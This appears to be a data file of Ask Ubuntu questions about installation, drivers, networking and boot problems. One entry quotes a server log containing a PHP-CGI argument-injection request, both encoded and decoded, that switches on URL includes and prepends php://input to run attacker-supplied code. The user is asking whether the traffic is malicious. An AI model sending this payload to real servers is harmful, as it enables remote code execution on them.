392695	problem with internet connection alfa awus036h on ubuntu 12.04	i installed ubuntu 12.04 amd64 today . and i am having a problem with my internet connection . here is the situation , i am using an alfa awus036h as my network adapter and when i connect to a wireless network it works only for a few seconds , and then the download rate becomes very slow and after a few seconds more it becomes zero . but the signal strength is always 3/4 . tried to disable ipv6 and it did n't help . i am new to linux and ubuntu so i would be very happy if someone could help me .
392698	no internet connection ( dns server address is router address )	my internet connection in ubuntu 13.10 does n't work . i can use ip addresses to open websites but not urls . the dns server that i connect to is the ip address of my router . when i connect to the vpn of my employer i can access the web . i found the following hint to resolve a similar problem on this post . it recommends typing sudo mv /etc/resolv.conf /etc/backup.resolv.conf to remove the resolv.conf file . this made the problem even worse . when i now try to connect to the vpn it says the vpn connection failed due to unsuccessful domain name resolution . i am a rookie on ubuntu and thus really lost . any recommendations of what to do ? : ~ $ cat /etc/network/interface cat : /etc/network/interface : no such file or directory : ~ $ cat /etc/resolv.conf cat : /etc/resolv.conf : no such file or directory : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:21 : cc:5f:25:5b up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : d2500000-d2520000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:884 errors:0 dropped:0 overruns:0 frame:0 tx packets:884 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:69077 ( 69.0 kb ) tx bytes:69077 ( 69.0 kb ) wlan0 link encap : ethernet hwaddr 8c : a9:82 : a7:3e : da inet addr:192.168.0.11 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : 2a02:908 : f423:4f80:8ea9:82ff : fea7:3eda/64 scope : global inet6 addr : 2a02:908 : f423:4f80:11ee:29c5:5d3b:588d/64 scope : global inet6 addr : fe80 : :8ea9:82ff : fea7:3eda/64 scope : link inet6 addr : 2a02:908 : f423:4f80 : :/128 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:61 errors:0 dropped:0 overruns:0 frame:0 tx packets:132 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8738 ( 8.7 kb ) tx bytes:26478 ( 26.4 kb )
392700	need some help with terminal	i want to open terminal to certain location with certain commands executed something like example ( file name click to open terminal and execute commands below ) cd folder\folder . venv/bin/activate after this terminal should remain open
392703	installing ubuntu when multiple windows 7 partitions exist , and permissions	my laptop has two partitions c : and d : , with windows 7 installed on the c : partition , d : containing very important files and documents . as i want to start using ubuntu , i 'm confused whether to copy these files in a usb or an external hard drive , or just let them there in d : and start my installation . for the record , i have already an extracted copy of ubuntu installation on d : partition . and my questions are : 1- can i install ubuntu from that partition d : ? 2- is it okey to let the important files in d : partition , and install ubuntu on c : partition 3- most important , what about permissions ? ? can i have some permissions problems when opening files on ubuntu ? ? ( it happened to me many times when installing windows over windows )
392704	does this pc meet hardware requirements for any ubuntu distribution ?	i have a very old pc with 1 gb ram and a 800 mhz amd duron cpu , 40 gb hdd . i need to run on it a distribution on which i can run libreoffice ( i need good .doc compatibility ) and firefox ( or midori ) . ubuntu 12.04 with openbox is too sluggish for decent use . it has therefore to be quite lightweight . the distro should preferably not to be a live . i will install it on the hdd .
392707	grub boot is changed ! help !	i am new to ubuntu . first of all i have dual os in my system ( windows and ubuntu ) . i downloaded grub customize and it was working fine ( giving me options to select my os in the boot menu ) , but when i updated my ubuntu os it did something with grub and now instead of it asking me to select my os in the boot menu , it gives me a command line like this : grub > what should i do to get to start my os and how do i change it back to normal ! thanks
392718	problems installing bspwm	i am trying to install bspwm via following the guide here : https : //github.com/windelicato/dotfiles/wiki/bspwm-for-dummies i have installed all the dependencies , and followed all the instructions exactly . however when i try `` make '' in the terminal i get : cc -std=c99 -pedantic -wall -wextra -i/usr/local/include -d_posix_c_source=200112l -dversion=\ '' 0.8.7\ '' -os -c -o bspwm.o bspwm.c bspwm.c:37:26 : fatal error : xcb/xinerama.h : no such file or directory compilation terminated . make : *** [ bspwm.o ] error 1 there 's not a lot of documentation around for bspwm and i ca n't find any ideas on google as how to fix this problem . if anyone has any idea what could possibly be the problem please let me know . thanks .
392719	32-bit uefi boot support	i recently purchased a dell venue 8 pro . i have read online about what it needs in order to boot into ubuntu or any other linux distro . from what i have gathered , what really needs to happen is 32-bit uefi support . i got information from several sites , but where it was really summed up was in this previous post : http : //ubuntuforums.org/showthread.php ? t=2187204 '' ubuntu has no 32-bit uefi installer , ask them to add support , they may listen . '' that thread was specifically about getting the dell venue 8/11 pro to boot linux . however , there are a slew of new tablets coming out running 32-bit uefi , and i think this is a trend that is going to continue to grow : mjg59.dreamwidth.org/26734.html '' uefi on ia32 is n't going away . it will show up on more embedded systems as time goes on . '' others have tried this before with mixed success , but have n't gotten things to work quite right : https : //www.happyassassin.net/2013/11/24/the-fedlet-revived-or-fedora-linux-on-a-dell-venue-8-pro-bay-trail/ '' it doesn’t really work . but it’s interestingly close . '' i 'm trying to start a thread dedicated thread on 32-bit uefi support , because that is the piece that is missing ( from what i understand ) . i do n't really know how to work with this stuff , but i 'm hoping that some people who do will read this and either contact canonical or somehow patch ubuntu ( or any other distro , really ) to work this way . again , i do n't really know how to do any of this ... i 'm just hoping someone can help ! dell venue 8 , 11 pro , toshiba encore , acer w3 , w4 , lenovo miix , and the asus transformer a100 are all tablets that will be affected by this ... i think these are going to be incredibly popular tablets once their prices go down , and i think people are really going to get interested in putting linux on these . any help is appreciated , and thank you all so much ! edit 4/1/14 : just booted into ubuntu on my dv8pro ! all you have to do is follow the instructions here : http : //www.jfwhome.com/2014/03/07/perfect-ubuntu-or-other-linux-on-the-asus-transformer-book-t100/ to summarize , what you need to do is download the latest ubuntu 14 daily build ( amd 64 is what worked for me ) and put that on a usb drive via rufus . 'for “partition scheme and target system type” , choose “gpt partition scheme for uefi computer.” ' you can get the latest daily build here : http : //cdimage.ubuntu.com/daily-live/current/ you will need to put the file found below into your efi/boot directory : https : //github.com/jfwells/linux-asus-t100ta/raw/master/boot/bootia32.efi disable secureboot and such -- follow the original instructions link if you do n't know how . then set the usb to boot first in bios . this should get you to grub . the rest i 'll quote the original author , it 's real straightforward : in the grub menu , highlight “try ubuntu” , and press “e” to edit it . in the editing screen , scroll down to the command line options , where it says “quiet splash” . delete “splash” and replace it with : video=vga-1:1368x768e reboot=pci , force [ edit : for those of us using the dell venue 8 pro , you need to use this line instead : video=vga-1:800x1280e reboot=pci , force that accounts for the different resolution of screen . ] then press f10 to boot . you should get all the way to the desktop . there you have it ! this got me to the unity desktop . problems : wifi is not working , but i used an ethernet adapter and that seems to work . i tried rotating the screen , but it throws your touch input off to one side , so i left it . make sure to read the tutorial mentioned earlier , it is more comprehensive , even though it is made for the asus t100 . if nothing else , the instructions i have provided should be enough just to get you to the unity desktop , which for me was amazing ! hope you too can have the same success and keep building on it ! for what it 's worth , someone else did this and posted a youtube video here : https : //www.youtube.com/watch ? v=1wrrngz4gie # t=94
392720	the disk drive for /tmp is not ready yet . s to skip mount or m for manual recovery	i know this has been asked before , but i ca n't find an answer that also pertains to this /tmp message . i have 12.04 lts on a toshiba laptop , as well as windows 7 . i really just started to dig into ubuntu on here , and so i barely have anything on the system . at this point i use ubuntu for xbmc streaming , and anything vpn related . for the past few months everything was fine . last week i started to theme it with icons and borders ... . that 's the only thing i 've done . shortly after , i get this message regarding /tmp drive . i just wait the 5 seconds and let it boot , but i 'm curious what 's going on . what i could have done to make this happen now . after it boots , everything works fine . everything shows healthy in g parted . i see this question asked a dozen times , but a dozen different answers in search . it would be great to not only fix it , but figure out how it happened . thanks edit : i see on ubuntu forums someone tried mount -o remount , rw / can i try that now , or would i have to restart , press m for manual , then type command in terminal ? 2nd edit : here 's what i get after cat /etc/fstab mike @ mike-ubuntu12 : ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=71d51bdc-9bd4-4897-85fb-c08d68620d4b / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=58a3a8ae-eb46-459c-9464-47cfa932b498 none swap sw 0 0 also , i get this tmp message sporadically . i booted my computer twice today and have not gotten this message ( so i do n't know if the fstab even helps ) but i got the message yesterday . edit : blkid and fstab in gedit
392723	trying to single install on macbook pro but wo n't automatically boot from new os ?	got a macbook pro , 13 inch , 500gb hard drive , 4gb memory . made a massive screw up on dual install , luckily had already transferred files to ubuntu one . ok , trying to install from usb , boots from that perfectly . currently using the `` try ubuntu without installation '' . looking at gparted : /dev/sda1 : fat32 . no mount point . size : 487mb , used : 4.27mb . flags : boot /dev/sda2 : ext2 . no mount point . size : 244mb , used : 51.69mb . no flags /dev/sda3 : lvm2 pv . mount point : ubuntu-vg size : 465.05gb , used : 465.01gb . flags : lvm unallocated : size : 1.02mb nb : this was after an attempted install using lvm ( ? ) nb 2 : i have no idea what any of these things mean : p i do physics ( undergraduate ) , not computer science ! i keep seeing the install programme through . i have tried doing the install from the trial desktop , doing the install from boot , and doing the install with oem . each time , whenever i restart ( as required by installation ) , it just asks me whether i want to install ( black screen with list of boot options ) . never gives me the option to boot from currently installed ubuntu . i have even tried to take out usb before the restart and it comes up with a flashing file symbol with a magnifying glass in the middle !
392724	puppet rspec no such file to load -- rspec-puppet ( loaderror )	i have no prior experience at all of ruby . i am not interested in ruby ( and so have no knowledge of rails etc ) as such but am using puppet to manage a group of servers . i have written some modules and the rspec-puppet system looks like it would be very useful . however , i can not get rspec-puppet to work i am using ubuntu lts 10.04 i have installed puppet rspec using the directions on their web page what i actually did apt-get install rubygems # ( installs 1.8 ) gem install rspec-expectations gem install rspec-puppet i also installed librspec-ruby1.8 then i ran rspec-puppet-init in a puppet module directory i 'd already made ( it 's a working puppet module ) i made a file as defined in the tutorial $ more spec/defines/rule_spec.rb require 'spec_helper' describe 'vanusers : :rule ' do let ( : title ) { 't1 ' } it { should contain_class ( 'vanusers : :jamiea ' ) } end but when i try and run it there is a mysterious dependancy issue $ spec spec/defines/rule_spec.rb /home/jamie/git/puppet/modules/vanusers/spec/spec_helper.rb:1 : in `require ' : no such file to load -- rspec-puppet ( loaderror ) from /home/jamie/git/puppet/modules/vanusers/spec/spec_helper.rb:1 from ./spec/defines/rule_spec.rb:1 : in `require' from ./spec/defines/rule_spec.rb:1 from /usr/lib/ruby/1.8/spec/runner/example_group_runner.rb:15 : in `load' from /usr/lib/ruby/1.8/spec/runner/example_group_runner.rb:15 : in `load_files' from /usr/lib/ruby/1.8/spec/runner/example_group_runner.rb:14 : in `each' from /usr/lib/ruby/1.8/spec/runner/example_group_runner.rb:14 : in `load_files' from /usr/lib/ruby/1.8/spec/runner/options.rb:132 : in `run_examples' from /usr/lib/ruby/1.8/spec/runner/command_line.rb:9 : in `run' from /usr/bin/spec:3 here is the solution i came up with in the end : : apt-get install rubygems gem install rspec-expectations rspec-puppet puppet-lint puppetlabs_spec_helper so your path picks up the gem stuff export path=/var/lib/gems/1.8/bin : $ path cd into module and rm spec/spec_helper.rb rspec-puppet-init replace rakefile with require 'rake' require 'rspec/core/rake_task' require 'puppetlabs_spec_helper/rake_tasks' then `` rake spec '' to run tests or `` rake lint '' to check files http : //sysadvent.blogspot.co.uk/2013/12/day-22-getting-started-testing-your.html was an excellent source of info
392726	syslinux 4.02 installation error	i 'm very new to the whole ubuntu thing . a little back story , my acer aspire s3 951 's os deleted itself . i do n't know why , but it happened as soon as the warranty expired . so i was having a hell of a time attempting to get windows 7 to boot . the issue with that though , is that i could n't get passed picking my hard drive to install windows . something about not being able to enable the disk . and my bios menu had nothing at all where i could enable it . ( bios 1.15 version ) so i gave up on windows . now , i 've tried both unetbootin , and universal-usb-installer to 'burn ' the iso onto a usb . and about 10 different ways for both as well . both 32 & 64 bit . i know next to nothing about programming . but i feel like i should be able to get passed a black screen that says syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al there 's a blinking line underneath that as well . like i should be able to type something . however , nothing happens . and the only button that works at this screen is the power button . if i ca n't get my ultrabook to work , i think i might just take a buck shot to it and sell it for scrap . any help would be much appreciated . it 's been about a 3 months since i 've been able to work this thing . and yes , i 've formatted the hd , it is literally a shell with nothing in it . not even an os . i 've looked around , and found people talking about the 'cfg ' file , and do n't quite know what to do with that if that is the problem . again , i have very little experience with programming . i 'm a mechanical engineer and all this stuff does is confuse the living hell out of me..
392728	ubuntu vnc4server no working session only terminal	so i 've trid to get xrdp working on ubutnu server 13.10 which meant a lot of messing around with lightdm and gdm . so after giving up on xrdp i switched to vnc . i installed vnc4server purged lightdm ( as i chose it over gdm ) installed ubuntu desktop , and instead of seeing my desktop i get only a terminal or if trying to run either unity or gnome-session in my xstartup i get either a gray screen if the line is not commented out or a patterned screeen both with the x cursor . what could be the cause of this ? xstartup : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager # exec /etc/x11/xinit/xinitrc gnome-session-fallback & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey # vncconfig -iconic & # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & # unity & gnome-session -- session=classic & and my screen looks exactly like in this question : why ca n't i get a working session with vnc4server although the answer there has n't helped in my case .
392730	ubuntu hanging on wallpaper on installation ( packard bell easynote ts )	i am trying to dualboot win 7 ( which i am running currently ) with ubuntu 12.04.3 lts and when i boot into the installer window i am left hanging on the wallpaper . i am running : amd a4-3305m amd radeon hd 6480g 4gb ram ahci not ide insydeh20 enabled 64 bit ( the installation iso says amd64 ) i hope someone can help ! thanks , thejohndunster
392737	how do i disable cursor shadow ?	is it possible to disable the cursor shadow in ubuntu 13.10 ? the shadow is ruining my cursor theme 's glow effect .
392744	how to enable trash function for folder var/www instead of permanent deletion ?	how to enable trash function for var/www folder ? i guess deleted files can not be moved to trash from that folder , because that is a special one ( belongs to root ) and its ' files should not be accessed by everyone , yet it should n't concern the only user of the computer .
392748	how to set an application pop-up in every boot ?	i supposed that this is one of these very easy things but i really could not find it via google . so i decided to ask here anyway the app is xpad which is a very `` simple '' simple sticky note software but i am using it to not forget stuffs , but i even forget to check xpad ! so it has to pop-up itself in every boot so i can remember stuffs i have to do . how can i set it up for that ?
392750	how to start projectlibre ?	being complete dummy in linux world . i have just installed ubuntu 13.10 and projectlibre 1.5.7-1 application projectlibre show up in the application list . but when i click on it , nothing happens . i have tried to find information on the web but i am afraid to be limited by my linux understanding . any suggestion would be welcome
392756	what the original license ubuntu theme	hei all , i have search on google about the original license of ubuntu theme but did n't found it for the example `` ambiance '' , yes you can got it on internet , but has modified an people release under deferent license , no author contact address etc in its folder . ok just , i need to edit it too
392757	connecting to the internet from the public library desktop computers	i have a live version of ubuntu 12.04 running flawlessly with persistance on my kingston usb stick . i wish to be able to log onto my public library 's internet with this ubuntu . however it does n't connect on startup , as it does automatically in every other wired connection where i run t. these computers have windows nt i believe installed by default , and it is extremely limited to the user . i ca n't access internet settings nor anything of that sort in order to see how does this internet connection works . clerks have no idea , they only switch on and off the cafe management software . how to proceed ?
392760	ubuntu 13.10 extremely slow and laggy	i recently installed ubuntu 13.10 and its been extremely slow ever since . the annimation that appears when you open or close an application takes about 15-20 seconds to complete . i have searches the internet but only found people talking about unity being slow ( im new to this so that doesnt really mean much to me ) i watched a video in which he used gnome was used instead of unity . if i install gnome will this fix the lag ? any help appreciated . thanks
392763	how to merge two unallocated partitions using gparted ?	i am having trouble merging two unallocated partitions ( free spaces ) using gparted . i need to merge them into one single partition which i can then break into `` root '' and `` home '' for my pending ubuntu installation . please help ! here is a snapshot of what my partition table looks like right now : ( there are two unallocated partitions of 36.23 gb and 11.16gb respectively , which i need to merge )
392770	fix permissions for /usr	while trying to install adobe-flashplayer as a normal user ( via a setuid binary , do n't ask ! ) , i suddenly noticed that the owner for /usr had been changed to myusername.myusername ! apparently , this is a known bug with flash player . naively , i thought i 'd fix this by running sudo chown -r root.root /usr . this kind of worked , but caused the suid root bit to get unset on all setuid binaries under /usr . this means no /usr/bin/sudo ! is there a way to fix this , or at least a list of all setuid binaries somewhere that i can use to manually fix permissions in single-user mode ?
392771	xubuntu installation error with cd : edd error bb00 reading sector	i 'm trying to install xubuntu on my dell latitude d600 . the version i tried to install was xubuntu 12.04.3 lts ( precise pangolin ) the x86 desktop version . these are the error codes i got after booting up the cd : edd error bb00 reading sector 345649 edd error bb00 reading sector 345653 how to solve this ? if you need more specific info , let me know .
392772	detecting a printers ink level	i am looking for an app , preferably gui like that detects the printers ink level . specially for the latest models of printer models like hp , epson and canon amongst others . my idea is to solve several office related problems , being this one , one of them . i jave tried the escputil and ink apps with no luck . what else can i do .
392773	can not install or update software	all my attempts to either run software updater or install software using system tools returns fatal error : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse )
392774	how to share a wireless printer in a shared ubuntu/xp lan	i have a lan network where a wireless printer is connected . ubuntu sees the printer but windows xp does not . how can i use ubuntu to share the printer with the xp computers ? publishing `` shared printers connected to to this system '' via the right click and share causes the xp machines give me a permission error . however , if i connect the printer was connected via usb it would work but since it is wirelessly it gives the error . the steps i have already done are : share printer through the printer server options and the sharing option inside the printing options . went to the cups website : http : //local.host:631 and tried configuring through there . configured samba to share the printer via the smb.cfg . after doing all the above steps , the xp clients can see the printer but can not connect to it giving me a permission error .
392778	is there a gui for apache , mysql just like xampp for windows ?	i know how to install apache , mysql , php ..etc but i do not want apache and mysql to start at boot time . i also do not want to start them manually using the terminal . i am looking for a gui program for this purpose just like xampp for windows if you have never used xampp for windows , here is a screenshot the gui for it :
392780	how do i specify mongodb 's config file ?	i am running mongodb as a service on ubuntu server . how can i specify the config file that mongodb uses ? is there a file with the command that starts mongod that i can edit to add the -- config flag ?
392785	installed ubuntu 13.10 on new hp pavilion 17 notebook pc , but system hangs on boot with a black screen	this is a 64-bit system with an uefi boot ; secure boot is turned off ; hd graphics 4600 . i installed from a live disc and updated the system during the installation ; but on reboot all i get is a black screen and the boot process stops . i ca n't access the grub menu . this is a dual-boot system , with windows 8.1 i see that others have had similar problems , but i do n't see any solutions that i could apply . thanks in advance for your help .
392787	download 12.04 onto bootable usb	i follow the instructions , `` how to create a bootable usb stick on windows '' . i have downloaded pendrivelinux.com . i select the distribution i wish to put on to my usb , which is ubuntu . step two , `` browse to your ubuntu desktop.iso -- > '' . i have already opened `` do you want to open or save ubuntu-12.04.3-desktop-amd64.iso ( 708mb ) from mirrorsfwankie.com '' . when i browse from pendrive usb installer , nothing comes up ; a temporary file location is shown in the address bar . then i go to computer , and there i find `` hd dvd-rom drive ( f ) : install ubuntu '' i just do not know what to do from here . i would appreciate any help with this . thank you .
392788	powersafe , no fan sound , generally silent and light ubuntu configuration	i usually travel with my notebook and my journey is quite long . i need to slow my pc as much as its possible to safe power for more time . i need to use text editor even nano is fine and i want to play music . i found how to open linux in terminalmode without gui what as i hope safes power . my next idea is to leave on 1 proccessor and turn off rest ( 3 ) to get more minutes . i also consider to slow down fan in case of reduce power consumption . do you know how can make my linux as thin as possible to safe power for extreme long time ? well , if you know any other distributions wchich better suits my needs please write them . thanks
392796	libgtk-x11-2.0.so.0 : i386 not available on ubuntu 13.10 64 bit ; troubles with adobe air	i 've been trying to install adobe air on my 64 bit ubuntu machine . the first thing i tried was to follow this tutorial that symlinks the missing libraries , but it is under the impression that hal was still available , so i then had to follow this guide to get hal working . now my issue is that when i try to run ./adobeairinstaller.bin , it tells me that it ca n't find libgtk-x11-2.0.so.0 because of 13.10 's folder structure ( libraries are n't simply in /usr/lib anymore , they 're sub-foldered by build ) . i then tried to make a symlink from /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 to /usr/lib/libgtk-x11-2.0.so.0 , but lo and behold , we need it to be a 32 bit library , says the linker : /tmp/air.rykqla/setup : error while loading shared libraries : libgtk-x11-2.0.so.0 : wrong elf class : elfclass64 i ca n't seem to find the package libgtk-x11 in synaptic , and sudo apt-get install libgtk2.0-0 : i386 did n't get the right library . is there a way around this or a way to get libgtk-x11-2 : i386 ? thank you in advance !
392798	find out where the directory is in linux ?	when i executed the command to give the pid of my processes running , it gave me like this - user @ machinea : / $ ps -eo pid , command | grep exhibitor | grep java | grep -v grep 1615 java -jar ./exhibitor-1.2.3/lib/exhibitor-1.2.3-jar-with-dependencies.jar -- fsconfigdir /opt/exhibitor/conf -- hostname machinea now i saw this path in the above output - ./exhibitor-1.2.3/lib/exhibitor-1.2.3-jar-with-dependencies.jar now i am trying to understand where this folder is ./exhibitor-1.2.3/ as i am not able to find out . does this folder on the same ubuntu machine ? is there any way to find out that directory where it is ? i am running ubuntu 12.04
392802	swat : by shares `` create '' is missing	i have checked all described in the `` how to install and configure swat in ubuntu server 12.04 '' but it seems swat ca n't handling the cfg information . at the shares the `` create '' is missing , at the globals the base options are missing and when i want to switch to advanced the screen will be empty , only the title `` samba '' will be displayed . ( but samba is working properly ... ) at the install - normal installation , 12.04.3 server , x86 - only samba selected - after restart : sudo apt-get install swat xinetd i have received the log messages as follows : [ 2013/12/17 14:49:25.186512 , 0 ] auth/pampass.c:827 ( smb_pam_passcheck ) smb_pam_passcheck : pam : smb_pam_auth failed - rejecting user root ! [ 2013/12/17 14:49:45.018207 , 0 ] lib/fault.c:47 ( fault_report ) =============================================================== [ 2013/12/17 14:49:45.018328 , 0 ] lib/fault.c:48 ( fault_report ) internal error : signal 11 in pid 3469 ( 3.6.3 ) please read the trouble-shooting section of the samba3-howto [ 2013/12/17 14:49:45.018409 , 0 ] lib/fault.c:50 ( fault_report ) e.t.c . thank you for help in advance . andrรกs
392806	installing maya on ubuntu linux	installing autodesk maya on ubuntu is possible , but can be a bit challenging . assuming that one already has the required specs and a solid graphics card driver installed , how can it be done ?
392810	issues installing matlab on ubuntu 12.04 64 bit	i 'm trying to install matlab 2012b on 12.04 64 bit system . i tried sudo /media/mathworks_r2012b/install and got the following error message . installing ... /tmp/mathworks_4131/sys/java/jre/glnxa64/jre/bin/java : 4 : /tmp/mathworks_4131/sys/java/jre/glnxa64/jre/bin/java : syntax error : unterminated quoted string finished what can i do to remedy this ?
392813	display issue : 12.04 lts	just installed 12.04 lts . my 24 '' monitor and support high resolution upto 1600x1200 first power up : display is fine second power up : display is 800x600 ( i think ) third and there after : stuck at 640x480 display setting does not allow for changes . any ideas how i can fix this ?
392815	how do i get deb2pet for ubuntu ?	how do i get deb2pet for ubuntu ? you may be wondering why i want a program that converts debian packages to puppy packages installed on a debian-based system . well , i use ubuntu and i am one of the new anitaos contributors . i would like to have deb2pet installed on my ubuntu system so i can port software .
392819	setting which brightness determines screen brightness	i 'm having an issue running kubuntu 13.04 with brightness , something that seems common . in particular , brightness can be found in these 2 directories : /sys/class/backlight/acpi_video0/brightness /sys/class/backlight/intel_backlight/brightness now , the fn+up/down buttons do in fact edit the brightness as specified in acpi_video0 : however , this brightness is not what is rendered , instead the intel_backlight brightness is rendered and that one i have to edit it manually . how can i set it so that the brightness specified in acpi_video0 is the one that my laptop renders , so that i can use the button shortcuts to change brightness as desired ?
392820	how to use external media in virtualbox windows installation	i have ubuntu 13.10 64 bit and i have windows 7 professional installed in virtualbox . i want to be able to plug my ipod in and use itunes from the windows installation . i ca n't install windows 7 of my pc because when it boots for the first time the screen goes black for hours . my only other option is virtualbox , when i go to orical 's website it only has downloads for ubuntu 13.04 , what do i do ?
392821	how to install ubuntu on windows 8.1 pre-installed	ive been reading all of the ask ubuntu questions i can find , but im still having trouble getting ubuntu installed on my new laptop ! it came pre-installed with windows 8.1 and id like to dual boot with either 12.04 or 13.10 , whichever i can get running ! i am not exteremely computer savvy , but i know enough to get me by . i tried changing from uefi boot to csm in the bios , disabling secureboot , and disabling fast startup to no avail . i still would love to be able to run ubuntu , but i cant find anything else to help me ! i can get to the first screen where it gives the try before installing and install options , but once i choose an option , it just turns the screen black . any help would be greatly appreciated ! : ) ps : i 'm running a toshiba satellite , if that helps anyone !
392822	login errors in .bashrc in 13.04	i just upgraded to 13.04 , and suddenly i get xsession errors in my .bashrc on login . there is nothing wrong with the .bashrc file -- i can source it from a terminal login , and after i get into the desktop it also sources fine . but during the desktop login there are errors in the following two sections : ps1= '' \ [ \e [ 1 ; 34m\ ] -- -\w -- -|\ [ \e [ 0m\ ] `` .xsession-errors says : /usr/sbin/lightdm-session : 9 : [ : up : unexpected operator for i in { 1..3 } do export dc $ i= '' bhawkins @ dc- $ i ... edu '' done .xsession-errors says : /usr/sbin/lightdm-session : 79 : bad identifier dc { 1..3 } the .bashrc file has not changed since upgrading , and of course there is no syntax error . is there maybe something in 13.04 that is referencing .bashrc in a new way , using a different shell that does n't understand basic bash ?
392823	is this malcious traffic ?	i was reviewing my server logs , when i came across several thousand this gem : from a multiple ip addresses : my question is what is all this junk ? what is this trying to execute ? i am pretty sure that i am not using cgi-bin for anything . i am running an ubuntu 13.04 server . it reads : 69.64.59.8 - - [ 18/dec/2013:16:12:43 -0500 ] `` post /cgi-bin/php ? % 2d % 64+ % 61 % 6c % 6c % 6f % 77 % 5f % 75 % 72 % 6c % 5f % 69 % 6e % 63 % 6c % 75 % 64 % 65 % 3d % 6f % 6e+ % 2d % 64+ % 73 % 61 % 66 % 65 % 5f % 6d % 6f % 64 % 65 % 3d % 6f % 66 % 66+ % 2d % 64+ % 73 % 75 % 68 % 6f % 73 % 69 % 6e % 2e % 73 % 69 % 6d % 75 % 6c % 61 % 74 % 69 % 6f % 6e % 3d % 6f % 6e+ % 2d % 64+ % 64 % 69 % 73 % 61 % 62 % 6c % 65 % 5f % 66 % 75 % 6e % 63 % 74 % 69 % 6f % 6e % 73 % 3d % 22 % 22+ % 2d % 64+ % 6f % 70 % 65 % 6e % 5f % 62 % 61 % 73 % 65 % 64 % 69 % 72 % 3d % 6e % 6f % 6e % 65+ % 2d % 64+ % 61 % 75 % 74 % 6f % 5f % 70 % 72 % 65 % 70 % 65 % 6e % 64 % 5f % 66 % 69 % 6c % 65 % 3d % 70 % 68 % 70 % 3a % 2f % 2f % 69 % 6e % 70 % 75 % 74+ % 2d % 64+ % 63 % 67 % 69 % 2e % 66 % 6f % 72 % 63 % 65 % 5f % 72 % 65 % 64 % 69 % 72 % 65 % 63 % 74 % 3d % 30+ % 2d % 64+ % 63 % 67 % 69 % 2e % 72 % 65 % 64 % 69 % 72 % 65 % 63 % 74 % 5f % 73 % 74 % 61 % 74 % 75 % 73 % 5f % 65 % 6e % 76 % 3d % 30+ % 2d % 6e http/1.1 '' 404 493 `` - '' `` mozilla/5.0 ( ipad ; cpu os 6_0 like mac os x ) applewebkit/536.26 ( khtml , like gecko ) version/6.0 mobile/10a5355d safari/8536.25 '' which translates into : [ 18/dec/2013:16:12:44 -0500 ] `` post /cgi-bin/php.cgi ? -dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions= '' '' -dopen_basedir=none-dauto_prepend_file=php : //input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-n http/1.1 '' 404 497 `` - '' `` mozilla/5.0 ( ipad ; cpu os 6_0 like mac os x ) applewebkit/536.26 ( khtml , like gecko ) version/6.0 mobile/10a5355d safari/8536.25 ''
392824	no audio out in ubuntu 12.04	i have ubuntu 12.04 installed . i can not get my audio to work . i have hdmi output to samsung tv . under sound settings i have digital ouput ( s/pdif ) and analog output but neither give me the option for hdmi . i 'm removed alsa and pulse audio and reinstalled . tried alsamixer among some other things but nothing seems to help . mobo is m4a785td-m evo . my sound card shows up in aplay but not in sound settings ~ $ aplay -l list of playback hardware devices ** card 0 : sb [ hda ati sb ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : vt1708s digital [ vt1708s digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 2 : vt1708s hp [ vt1708s hp ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
392825	how to flash ( chrome or firefox ) hardware accelerated decoding ? something instead ?	what can i do to get gpu to work on decoding flash video ? at chrome : //gpu graphics feature status page i see all stuff green ok like video decode : hardware accelerated , yet flash nerd statistics tell me that decoding is done by software ( yet rendering is accelerated ) . i got not open source ( additional ) drivers for mobile ati hd 7340 . had to change one chrome flag to make rendering accelerated . what about decoding ? edit : i lowered cpu usage for totem via direct2d http : //www.webupd8.org/2010/04/how-to-enable-direct2d-acceleration-in.html , but no changes in flash .
392828	how can i install gcc6809 ?	how can i install gcc6809 ? http : //code.google.com/p/gcc6809/downloads/list i am a new user to the system ubuntu , i need your help in installing this source . i hope that you will help me . thank you in advance .
392835	how to lower flash video resources usage for chrome minimized ?	i noticed that minimized or not makes no difference for cpu usage when playing flash video in chrome . how to fix that ( seems obviously not right ) ? what makes it annoying is that i have video decoding done by software .
